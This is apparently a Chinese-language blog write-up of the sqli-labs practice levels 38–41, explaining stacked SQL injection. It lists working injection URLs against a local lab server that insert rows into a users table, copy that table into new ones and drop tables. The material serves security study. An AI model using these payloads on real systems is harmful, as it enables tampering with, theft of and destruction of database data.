• Less38-Less41(堆叠注入 GET型)


    Stacked injections:堆叠注入

    从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。

     

     

     参考原文: https://www.cnblogs.com/lcamry/p/5762905.html

    Less38:使用’1’进行包裹 

     

     

     注入可以参考https://blog.csdn.net/Kevinhanser/article/details/81592862

    http://192.168.27.156/sqli-labs/Less-38/?id=1';insert into users(id,username,password) values ('38','gxy','38')--+

     Less-39: id 没有进行任何包裹  其他与第38关一致

     

    http://192.168.27.156/sqli-labs/Less-39/?id=1;create table gxy39 like users;insert into gxy39 select * from users;--+

     

     

    http://192.168.27.156/sqli-labs/Less-39/?id=1;drop table gxy39  --+

     

    Less-40:使用(‘1’)进行包裹  其他与第38关一致

     

    http://192.168.27.156/sqli-labs/Less-40/?id=1?id=1');create table gxy40 like users;insert into  gxy40 select *from users; --

     

     

     http://192.168.27.156/sqli-labs/Less-40/?id=1?id=1');drop table gxy40 ;

     

    Less41: 无包裹,不回显错误  其他与第38关一致

    http://192.168.27.156/sqli-labs/Less-41/?id=1'

     

     http://192.168.27.156/sqli-labs/Less-41/?id=1; create table gxy41  like users;insert into  gxy41 select *from users; --

  • 相关阅读:
    开工--行胜于言
    操作系统之内存管理
    C陷阱与缺陷读书笔记(一)
    关于复杂度的一些基本的定义
    归并排序
    快速排序
    前序中序后序非递归遍历
    直接插入排序
    冒泡排序
    程序内存映像
  • 原文地址:https://www.cnblogs.com/7-58/p/12268292.html
Copyright © 2020-2023  润新知